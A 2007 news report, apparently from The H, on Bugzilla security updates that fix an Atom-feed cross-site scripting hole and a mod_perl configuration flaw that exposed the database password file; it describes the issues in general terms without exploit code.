In association with heise online

05 February 2007, 15:36

Bugzilla developers remedy vulnerabilities

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

Versions 2.20.4, 2.22.2, and 2.23.4 of the bug tracking system Bugzilla, have been released. According to an advisory, with this update the developers have remedied two critical vulnerabilities that may have allowed for cross-site scripting (XSS) by means of manipulated database entries and the disclosure of the password for the database.

The XSS hole concerns the Atom feeds in Bugzilla 2.20.1 and later versions, which may pass on JavaScript code contained in the database entries to the feed reader. This code may then be executed in readers that support JavaScript, possibly allowing attackers to gain access to sensitive user data.

The flaw in the handling of the database password exclusively concerns version 2.23.2 of Bugzilla, provided it is running with Apache module mod_perl. A missing entry in a block of the Apache configuration renders the .htaccess file, designed to prevent unauthorized access through the Web server, ineffective. Attackers may then be able to remotely read out the file containing database access data.

The Bugzilla developers say that versions 2.18.x do not contain the two vulnerabilities. However, administrators of more recent versions should switch to the remedied version of their software as quickly as possible.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit